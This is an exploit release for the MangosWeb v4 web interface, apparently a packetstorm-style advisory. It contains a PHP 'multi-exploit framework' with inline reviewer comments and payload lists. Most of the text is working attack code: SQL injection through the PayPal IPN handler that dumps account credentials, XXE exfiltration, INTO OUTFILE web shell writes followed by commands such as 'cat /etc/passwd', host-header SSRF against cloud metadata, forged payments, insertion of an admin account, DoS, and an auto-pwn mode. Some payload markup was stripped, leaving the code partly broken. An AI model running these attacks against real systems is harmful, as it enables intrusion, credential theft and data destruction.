============================================================================================================================================= | # Title : MaNGOSWeb V4 4.0.6 MangosWeb v4 Multi-Exploit Framework | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/ipn.php | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/212429/ & CVE-2017-6478 [+] Summary : A comprehensive penetration testing tool designed to identify and exploit multiple critical vulnerabilities in MangosWeb v4, a World of Warcraft emulator web interface. [+] Core Components : Multi-Vector Attack Framework SQL Injection exploitation via PayPal IPN XXE (XML External Entity) attacks via RSS feed File Write vulnerabilities leading to RCE Host Header Injection for SSRF/phishing CSRF (Cross-Site Request Forgery) attacks DoS (Denial of Service) testing [+] POC : target = rtrim($url, '/'); $this->base_url = $this->target; $this->session = curl_init(); // إعدادات cURL curl_setopt_array($this->session, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 15, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false ]); echo "===========================================\n"; echo "MangosWeb v4 Exploitation Framework Started\n"; echo "Target: {$this->target}\n"; echo "===========================================\n\n"; } // 1. 
// NOTE(review): this listing is damaged. The class header, its properties and
// the start of __construct are missing, and every "<...>" fragment appears to
// have been stripped by the extractor: the DTD/XML payloads, the PHP embedded
// in the OUTFILE and DoS payloads, and the HTML of the web interface. The
// affected string literals are therefore not what the author wrote, and the
// DoS method is left with an unterminated double-quoted string. The code is
// reproduced as printed; only comments were added or translated.
//
// Shared state to keep in mind while reading the methods: one cURL handle
// ($this->session, created in the constructor) is reused for every request,
// and cURL options persist on a handle until overwritten. CURLOPT_HTTPHEADER
// set by exploit_paypal_sqli, exploit_host_injection or exploit_csrf stays on
// every later request of the auto_pwn sequence, and CURLOPT_POSTFIELDS is
// never cleared.
//
// Defender's view: every primary vector below is a single unauthenticated
// POST to paypal_ipn.php whose fields are used without verification.
// Validating each IPN with PayPal before acting on it and using prepared
// statements closes all of them; IPN posts that fail that validation, or
// that carry SQL meta-characters in txn_id/item_number, are the detection
// signal.

    // 1. Path discovery
    // Probes a fixed list of paths and records those answering HTTP 200.
    // Returns $this->results['endpoints'], keyed by path, true for each hit.
    public function discover_paths() {
        echo "[*] Scanning for vulnerable endpoints...\n";
        $endpoints = [
            '/paypal_ipn.php',
            '/rss.php',
            '/index.php',
            '/admin/',
            '/core/cache/rss/news.xml',
            '/config/config-protected.php',
            '/install/',
            '/donate.php'
        ];
        foreach ($endpoints as $endpoint) {
            $url = $this->target . $endpoint;
            curl_setopt($this->session, CURLOPT_URL, $url);
            $response = curl_exec($this->session); // body fetched but never inspected
            $http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
            // CURLOPT_FOLLOWLOCATION is enabled in the constructor, so a
            // redirect to any generic 200 page counts as "found": expect
            // false positives from catch-all handlers.
            if ($http_code == 200) {
                echo "[+] Found: {$endpoint}\n";
                $this->results['endpoints'][$endpoint] = true;
            }
        }
        // NOTE(review): when nothing answered 200 this key was never created,
        // so the return is null (with an undefined-index warning).
        return $this->results['endpoints'];
    }

    // 2. PayPal IPN SQL injection
    // Sends four UNION-based probes in the txn_id field of the IPN handler and
    // saves any response longer than 100 bytes to sqli_result_<type>.txt.
    public function exploit_paypal_sqli() {
        echo "\n[*] Exploiting PayPal IPN SQL Injection...\n";
        $payloads = [
            // database version, user and schema name
            "1' UNION SELECT 1,2,3,4,5,6,7,8,@@version,10,user(),database() -- -" => "db_info",
            // table names
            "1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name),10,11 FROM information_schema.tables WHERE table_schema=database() -- -" => "tables",
            // column names
            "1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name),10,11 FROM information_schema.columns WHERE table_name='mw_accounts' -- -" => "mw_accounts_columns",
            // account rows
            "1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,':',password,':',email),10,11 FROM mw_accounts LIMIT 0,10 -- -" => "accounts"
        ];
        $ipn_url = $this->target . '/paypal_ipn.php';
        foreach ($payloads as $payload => $type) {
            $post_data = [
                'txn_id' => $payload,
                'item_name' => 'VIP Package --- Account: admin(#1)',
                'item_number' => '1',
                'payer_email' => 'attacker@evil.com',
                'payment_type' => 'instant',
                'payment_status' => 'Completed',
                'mc_gross' => '100.00',
                'custom' => 'exploit'
            ];
            curl_setopt_array($this->session, [
                CURLOPT_URL => $ipn_url,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => http_build_query($post_data),
                CURLOPT_HTTPHEADER => [
                    'Content-Type: application/x-www-form-urlencoded',
                    // Spoofed source address. A handler that allow-lists
                    // PayPal by trusting X-Forwarded-For is defeated by this;
                    // the mitigation is to verify the IPN with PayPal and to
                    // use the real peer address, never a client-supplied header.
                    'X-Forwarded-For: 173.0.82.126' // IP PayPal
                ]
            ]);
            $response = curl_exec($this->session);
            // "Success" here only means a body longer than 100 bytes came back;
            // any ordinary page satisfies it, so the saved files are raw
            // evidence to be read, not confirmation of injection.
            if (strlen($response) > 100) {
                echo "[+] SQL Injection successful for: {$type}\n";
                // Save the results
                $filename = "sqli_result_{$type}.txt";
                file_put_contents($filename, $response);
                echo " [*] Saved to: {$filename}\n";
                // Parse and extract data
                $this->parse_sqli_results($response, $type);
            }
        }
    }

    // 3. XXE via the RSS feed
    // NOTE(review): $dtd_content and $xxe_payload are printed without their
    // DTD/XML markup (only the '"> %param;' and '%remote; %exfil; ]>' fragments
    // survived extraction), so neither is well-formed as listed.
    // Defender's view: the server-side parser that renders mw_news into the
    // feed must not resolve external entities; an outbound request from the
    // web server to an unknown host while rss.php is served is the signal.
    public function exploit_rss_xxe() {
        echo "\n[*] Exploiting RSS XXE Vulnerability...\n";
        // Build the external DTD file
        $dtd_content = ' "> %param;';
        // Save it locally (to the working directory that
        // start_exfiltration_server() later serves)
        file_put_contents('xxe.dtd', $dtd_content);
        // XXE Payload
        $xxe_payload = ' %remote; %exfil; ]> XXE Test';
        // Try to plant the payload in mw_news through the IPN item_number field.
        // This is a stacked statement; whether the target's driver allows more
        // than one statement per call cannot be told from this listing.
        $payload = "1'); UPDATE mw_news SET message='" . addslashes($xxe_payload) . "' WHERE id=1; -- ";
        $post_data = [
            'txn_id' => 'xxe_inject',
            'item_name' => 'XXE Test --- Account: admin(#1)',
            'item_number' => $payload,
            'payer_email' => 'xxe@evil.com',
            'payment_status' => 'Completed'
        ];
        $ipn_url = $this->target . '/paypal_ipn.php';
        curl_setopt_array($this->session, [
            CURLOPT_URL => $ipn_url,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => http_build_query($post_data)
        ]);
        $response = curl_exec($this->session); // never inspected
        // Start the receiving server
        $this->start_exfiltration_server();
        // Request the RSS feed to trigger the XXE
        $rss_url = $this->target . '/rss.php';
        curl_setopt_array($this->session, [
            CURLOPT_URL => $rss_url,
            // NOTE(review): CURLOPT_POST => false may not fully reset a handle
            // that previously POSTed (CURLOPT_HTTPGET is the documented reset);
            // the previous POSTFIELDS and HTTPHEADER are still attached. Verify.
            CURLOPT_POST => false
        ]);
        $rss_response = curl_exec($this->session);
        // 'PD9waHA' is the base64 prefix of "<?php": the check looks for a
        // base64-encoded PHP file inside the feed body.
        if (strpos($rss_response, 'PD9waHA') !== false) {
            echo "[+] XXE Successful! Config file exfiltrated.\n";
        }
    }

    // 4. RCE via file write
    // NOTE(review): the PHP snippet passed to base64_encode() and the one
    // embedded in both OUTFILE payloads were stripped from this listing (the
    // empty '' literals are what remains); $php_shell is assigned but never used.
    // Defender's view: INTO OUTFILE needs the FILE privilege and a writable web
    // root. A database account without FILE, secure_file_priv set, and a web
    // root the DB server cannot write are the mitigations; "INTO OUTFILE" in
    // the query log and new .php files under the web root are the detections.
    // Returns true as soon as one probe URL answers with shell-like output,
    // false otherwise.
    public function exploit_file_write_rce() {
        echo "\n[*] Attempting RCE via File Write...\n";
        $php_shell = base64_encode('');
        $payloads = [
            // Write a shell via SELECT INTO OUTFILE
            "1' UNION SELECT 1,2,3,4,5,6,7,8,'',10,11 INTO OUTFILE '/var/www/html/shell.php' -- -",
            // Write a shell into the RSS cache path
            "1' UNION SELECT 1,2,3,4,5,6,7,8,'',10,11 INTO OUTFILE '" . $this->target . "/core/cache/rss/shell.php' -- -"
        ];
        foreach ($payloads as $index => $payload) {
            $post_data = [
                'txn_id' => $payload,
                'item_name' => 'RCE Shell --- Account: admin(#1)',
                'payer_email' => 'rce@evil.com',
                'payment_status' => 'Completed'
            ];
            $ipn_url = $this->target . '/paypal_ipn.php';
            curl_setopt_array($this->session, [
                CURLOPT_URL => $ipn_url,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => http_build_query($post_data)
            ]);
            $response = curl_exec($this->session); // never inspected
            echo "[.] Attempted RCE payload {$index}\n";
            // Check whether the shell is reachable
            $shell_urls = [
                $this->target . '/shell.php?cmd=id',
                $this->target . '/core/cache/rss/shell.php',
                $this->target . '/core/cache/rss/news.xml'
            ];
            foreach ($shell_urls as $shell_url) {
                curl_setopt_array($this->session, [
                    CURLOPT_URL => $shell_url,
                    CURLOPT_POST => false
                ]);
                $shell_test = curl_exec($this->session);
                // Substring match only: any page that happens to contain
                // "uid=" or "www-data" (an error page, for instance) is
                // reported as a working shell.
                if (strpos($shell_test, 'uid=') !== false || strpos($shell_test, 'www-data') !== false) {
                    echo "[+] RCE SUCCESSFUL! Shell at: {$shell_url}\n";
                    // Run commands
                    $commands = [
                        'whoami',
                        'pwd',
                        'ls -la',
                        'cat /etc/passwd'
                    ];
                    foreach ($commands as $cmd) {
                        // strpos() returns 0 (falsy) for a match at offset 0;
                        // harmless here only because every URL starts with the scheme.
                        $cmd_url = $shell_url . (strpos($shell_url, '?') ? '&' : '?') . 'cmd=' . urlencode($cmd);
                        curl_setopt($this->session, CURLOPT_URL, $cmd_url);
                        $result = curl_exec($this->session);
                        echo "\n[Command]: {$cmd}\n";
                        echo "[Result]: " . substr($result, 0, 500) . "\n";
                    }
                    return true;
                }
            }
        }
        return false;
    }

    // 5. Host Header Injection in RSS
    // Defender's view: rss.php should build absolute links from a configured
    // base URL, not from the Host / X-Forwarded-Host request headers.
    public function exploit_host_injection() {
        echo "\n[*] Exploiting Host Header Injection...\n";
        $malicious_headers = [
            'Host: evil.com',
            'Host: 127.0.0.1:3306',
            // NOTE(review): a Host value carrying a path is not a valid
            // header value; servers may reject or normalise it. Verify.
            'Host: 169.254.169.254/latest/meta-data/', // AWS Metadata
            'Host: localhost:22',
            'X-Forwarded-Host: internal.admin.panel'
        ];
        $rss_url = $this->target . '/rss.php';
        foreach ($malicious_headers as $header) {
            curl_setopt_array($this->session, [
                CURLOPT_URL => $rss_url,
                CURLOPT_POST => false,
                // Replaces the whole header list; this value stays attached to
                // every later request on the shared handle.
                CURLOPT_HTTPHEADER => [$header]
            ]);
            $response = curl_exec($this->session);
            // The success test only looks for 'evil.com' or '127.0.0.1' in the
            // body, so the last three headers (including the AWS one) can only
            // be reported if the response happens to contain one of those two
            // strings; the metadata branch below is effectively unreachable.
            if (strpos($response, 'evil.com') !== false || strpos($response, '127.0.0.1') !== false) {
                echo "[+] Host Injection successful with: {$header}\n";
                // SSRF attempt
                if (strpos($header, '169.254.169.254') !== false) {
                    echo "[!] Possible AWS Metadata exposure!\n";
                }
            }
        }
    }

    // 6. CSRF attack - transaction forgery
    // NOTE(review): no victim browser is involved, so this is not CSRF in the
    // usual sense; it posts three unsigned IPN messages crediting account
    // $victim_account_id. Verifying every IPN with PayPal before crediting
    // anything is the mitigation; the response is never checked, so the
    // "[+] Sent" lines prove delivery only, not effect.
    public function exploit_csrf($victim_account_id = 1) {
        echo "\n[*] Launching CSRF Attack...\n";
        for ($i = 0; $i < 3; $i++) {
            $txn_id = 'CSRF' . time() . rand(1000,9999);
            $post_data = [
                'txn_id' => $txn_id,
                'item_name' => "Free Premium --- Account: victim(#{$victim_account_id})",
                'item_number' => '999',
                'payer_email' => 'noreply@paypal.com',
                'payment_type' => 'instant',
                'payment_status' => 'Completed',
                'mc_gross' => rand(50, 500) . '.00',
                'mc_currency' => 'USD',
                'payment_date' => date('H:i:s M d, Y T')
            ];
            $ipn_url = $this->target . '/paypal_ipn.php';
            curl_setopt_array($this->session, [
                CURLOPT_URL => $ipn_url,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => http_build_query($post_data),
                CURLOPT_HTTPHEADER => [
                    'Content-Type: application/x-www-form-urlencoded',
                    'Referer: https://www.paypal.com/'
                ]
            ]);
            $response = curl_exec($this->session); // never inspected
            echo "[+] Sent fake transaction: {$txn_id}\n";
        }
    }

    // 7. DoS attack
    // NOTE(review): the element tags of $large_xml and the PHP block after
    // $cache_payload were stripped from this listing; what is left after
    // $cache_payload opens a double-quoted string that is never closed, and the
    // "$post_data = [ 'txn_id' =>" that must have preceded 'dos_attack' is gone.
    // The timing test is ten sequential requests with the constructor's 15 s
    // timeout each, so a single slow or unreachable host trips the 5 s verdict.
    public function exploit_dos() {
        echo "\n[*] Testing DoS vulnerability...\n";
        // Build a large RSS document
        $large_xml = '';
        for ($i = 0; $i < 5000; $i++) {
            $large_xml .= '' . str_repeat('A', 1000) . '';
        }
        $large_xml .= '';
        // Attempt to write it into the cache
        $cache_payload = "1')); ?>" . $large_xml . " 'dos_attack', 'item_name' => 'DoS Test --- Account: admin(#1)', 'item_number' => $cache_payload, 'payer_email' => 'dos@attack.com', 'payment_status' => 'Completed' ];
        $ipn_url = $this->target . '/paypal_ipn.php';
        curl_setopt_array($this->session, [
            CURLOPT_URL => $ipn_url,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => http_build_query($post_data)
        ]);
        curl_exec($this->session);
        // Send several requests to consume memory (sequential, not concurrent)
        $rss_url = $this->target . '/rss.php';
        $start_time = microtime(true);
        for ($i = 0; $i < 10; $i++) {
            curl_setopt($this->session, CURLOPT_URL, $rss_url);
            curl_exec($this->session);
            echo ".";
        }
        $total_time = microtime(true) - $start_time;
        echo "\n[+] DoS test completed in {$total_time} seconds\n";
        if ($total_time > 5) {
            echo "[!] Server is vulnerable to DoS attacks\n";
        }
    }

    // 8. Add an admin user
    // NOTE(review): success is announced unconditionally; $response is never
    // read, and the stacked INSERT only runs if the target's driver accepts
    // multiple statements per call. Defender's view: a new mw_accounts row
    // with gmlevel 3 created outside the registration flow is the signal.
    public function add_admin_user() {
        echo "\n[*] Adding admin user to database...\n";
        $username = 'hacker_' . rand(1000,9999);
        $password = md5('Password123!');
        $email = 'hacker' . rand(100,999) . '@evil.com';
        $payload = "1'); INSERT INTO mw_accounts (username, password, email, gmlevel, joindate) VALUES ('{$username}', '{$password}', '{$email}', '3', NOW()); -- ";
        $post_data = [
            'txn_id' => 'add_admin',
            'item_name' => 'Add User --- Account: admin(#1)',
            'item_number' => $payload,
            'payer_email' => 'admin@paypal.com',
            'payment_status' => 'Completed'
        ];
        $ipn_url = $this->target . '/paypal_ipn.php';
        curl_setopt_array($this->session, [
            CURLOPT_URL => $ipn_url,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => http_build_query($post_data)
        ]);
        $response = curl_exec($this->session);
        echo "[+] Admin user added:\n";
        echo " Username: {$username}\n";
        echo " Password: Password123!\n";
        echo " Email: {$email}\n";
        echo " GM Level: 3 (Administrator)\n";
    }

    // 9. Dump accounts
    // Parses "ACCOUNT:user:pass:email:gmlevel" markers out of the response and
    // writes them to stolen_accounts.txt.
    // NOTE(review): the last capture group ([^:]+) is greedy and unbounded, so
    // the gmlevel field absorbs any trailing page text up to the next colon.
    public function steal_accounts() {
        echo "\n[*] Stealing user accounts...\n";
        $payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT('ACCOUNT:',username,':',password,':',email,':',gmlevel),10,11 FROM mw_accounts -- -";
        $post_data = [
            'txn_id' => $payload,
            'item_name' => 'Steal Accounts --- Account: admin(#1)',
            'payer_email' => 'steal@evil.com',
            'payment_status' => 'Completed'
        ];
        $ipn_url = $this->target . '/paypal_ipn.php';
        curl_setopt_array($this->session, [
            CURLOPT_URL => $ipn_url,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => http_build_query($post_data)
        ]);
        $response = curl_exec($this->session);
        if (preg_match_all('/ACCOUNT:([^:]+):([^:]+):([^:]+):([^:]+)/', $response, $matches)) {
            echo "[+] Stolen Accounts:\n";
            $accounts_file = 'stolen_accounts.txt';
            $file_content = "Stolen Accounts from {$this->target}\n";
            $file_content .= "====================================\n\n";
            for ($i = 0; $i < count($matches[0]); $i++) {
                $username = $matches[1][$i];
                $password = $matches[2][$i];
                $email = $matches[3][$i];
                $gmlevel = $matches[4][$i];
                echo " {$username} : {$password} : {$email} (GM: {$gmlevel})\n";
                $file_content .= "Username: {$username}\n";
                $file_content .= "Password: {$password}\n";
                $file_content .= "Email: {$email}\n";
                $file_content .= "GM Level: {$gmlevel}\n";
                $file_content .= "---\n";
            }
            file_put_contents($accounts_file, $file_content);
            echo "\n[+] Accounts saved to: {$accounts_file}\n";
        }
    }

    // 10. Auto Pwn - run every attack automatically
    // NOTE(review): only Exception is caught; an Error (for example a TypeError
    // from a false curl_exec() result) is not, and ends the run before
    // generate_report(). The closing banner prints regardless of what each
    // step actually observed.
    public function auto_pwn() {
        echo "\n[*] Starting AUTO-PWN sequence...\n";
        $steps = [
            'discover_paths',
            'exploit_paypal_sqli',
            'steal_accounts',
            'add_admin_user',
            'exploit_rss_xxe',
            'exploit_host_injection',
            'exploit_file_write_rce',
            'exploit_csrf',
            'exploit_dos'
        ];
        foreach ($steps as $step) {
            echo "\n[=== Step: {$step} ===]\n";
            try {
                $this->$step();
                sleep(2); // delay between attacks
            } catch (Exception $e) {
                echo "[!] Error in {$step}: " . $e->getMessage() . "\n";
            }
        }
        echo "\n========================================\n";
        echo "[✔] AUTO-PWN COMPLETED SUCCESSFULLY!\n";
        echo "========================================\n";
        // Show the final results
        $this->generate_report();
    }

    // Helper functions

    // Counts matches of three fixed patterns in a response.
    // NOTE(review): $type is unused, so every pattern is tried on every
    // response, and the 'mysql' pattern matches any dotted numeric triple
    // (an IP address, a product version), not only a MySQL version string.
    private function parse_sqli_results($response, $type) {
        $patterns = [
            'mysql' => '/[0-9]+\.[0-9]+\.[0-9]+/',
            'tables' => '/(mw_[a-z_]+)/',
            'accounts' => '/([a-zA-Z0-9_]+):([a-f0-9]{32}):([^:]+)/'
        ];
        foreach ($patterns as $pattern_type => $pattern) {
            if (preg_match_all($pattern, $response, $matches)) {
                echo " [*] Found {$pattern_type}: " . count($matches[0]) . " items\n";
            }
        }
    }

    // Starts a background PHP built-in server on port 8888.
    // NOTE(review): it binds 0.0.0.0 and serves the current working directory
    // without authentication, i.e. xxe.dtd and every *.txt result file this
    // tool writes are exposed to anyone who can reach the operator's machine,
    // and nothing ever stops the process.
    private function start_exfiltration_server() {
        // Start a simple server to receive data
        $port = 8888;
        echo "[*] Starting exfiltration server on port {$port}...\n";
        // This could run in a separate thread
        // Simplified example
        $cmd = "php -S 0.0.0.0:{$port} -t . > /dev/null 2>&1 &";
        exec($cmd);
    }

    // Writes exploitation_report.txt.
    // NOTE(review): the "Vulnerabilities Found" section is hard-coded and does
    // not depend on $this->results or on any step's outcome; only the file
    // list reflects what actually happened. The "6. " line carries a literal
    // line break that the listing introduced inside the string.
    private function generate_report() {
        $report = "MangosWeb v4 Exploitation Report\n";
        $report .= "Generated: " . date('Y-m-d H:i:s') . "\n";
        $report .= "Target: {$this->target}\n";
        $report .= "=====================================\n\n";
        $report .= "Vulnerabilities Found:\n";
        $report .= "1. SQL Injection (Critical)\n";
        $report .= "2. XXE Injection (Critical)\n";
        $report .= "3. RCE via File Write (Critical)\n";
        $report .= "4. Host Header Injection (High)\n";
        $report .= "5. CSRF (Medium)\n";
        $report .= "6. 
DoS (Medium)\n\n";
        $report .= "Files Created:\n";
        $files = glob('*.txt');
        foreach ($files as $file) {
            $report .= "- {$file}\n";
        }
        file_put_contents('exploitation_report.txt', $report);
        echo "[+] Report saved to: exploitation_report.txt\n";
    }

    // Releases the shared cURL handle.
    public function __destruct() {
        curl_close($this->session);
    }
}

// User interface
// NOTE(review): the usage text omits the 'dos' mode that the switch accepts.
if (php_sapi_name() === 'cli') {
    if ($argc < 2) {
        echo "Usage: php exploit.php http://target.com [mode]\n";
        echo "Modes:\n";
        echo " auto - Full auto exploitation (default)\n";
        echo " sql - SQL Injection only\n";
        echo " rce - RCE attempts only\n";
        echo " csrf - CSRF attacks only\n";
        exit(1);
    }
    $target = $argv[1];
    $mode = $argv[2] ?? 'auto';
    $exploit = new MangosWebExploit($target);
    switch ($mode) {
        case 'sql':
            $exploit->exploit_paypal_sqli();
            $exploit->steal_accounts();
            break;
        case 'rce':
            $exploit->exploit_file_write_rce();
            break;
        case 'csrf':
            $exploit->exploit_csrf();
            break;
        case 'dos':
            $exploit->exploit_dos();
            break;
        case 'auto':
        default:
            $exploit->auto_pwn();
            break;
    }
} else {
    // Web interface
    // NOTE(review): the HTML (including the form) was stripped from these
    // echo strings; only the bare text survived.
    echo ' MangosWeb v4 Exploit

MangosWeb v4 Exploitation Tool

';
    // NOTE(review): $_POST['target'] goes straight into the constructor and
    // $_POST['mode'] is read without isset(). If this file is ever reachable
    // over HTTP it becomes an unauthenticated relay that fires every request
    // above at whatever origin the caller names; keep it off any web server.
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['target'])) {
        echo '
';
        
        ob_start();
        $exploit = new MangosWebExploit($_POST['target']);
        
        switch ($_POST['mode']) {
            case 'sql':
                $exploit->exploit_paypal_sqli();
                $exploit->steal_accounts();
                break;
            case 'rce':
                $exploit->exploit_file_write_rce();
                break;
            case 'csrf':
                $exploit->exploit_csrf();
                break;
            case 'dos':
                $exploit->exploit_dos();
                break;
            default:
                $exploit->auto_pwn();
        }
        
        $output = ob_get_clean();
        // Output is HTML-escaped before being echoed back.
        echo htmlspecialchars($output);
        echo '
';
    }
    echo '
';
}
?>
************** # server_config.py************** # server_config.py
EXPLOIT_CONFIG = {
    'target': 'http://victim.com',
    'timeout': 30,
    'threads': 5,
    'payloads_file': 'payloads.txt',
    'output_dir': 'results',
    'sql_payloads': [
        "' UNION SELECT @@version --",
        "' AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd') --",
        "'); DROP TABLE mw_accounts; --"
    ],
    'xxe_payloads': [
        ']>',
        '%remote;]>'
    ]
}
**************************************
payloads.txt
-- SQL Injection Payloads
' OR '1'='1
' UNION SELECT NULL,NULL,NULL,NULL
'); INSERT INTO mw_accounts VALUES ('hacker',MD5('pass'),'h@cker.com','3',NOW()) --
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --
-- File Path Traversal
../../../../etc/passwd
../config.php
/var/www/html/config.php
C:\Windows\System32\drivers\etc\hosts
-- Command Injection
;id;
| whoami
`cat /etc/passwd`
$(uname -a)
Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================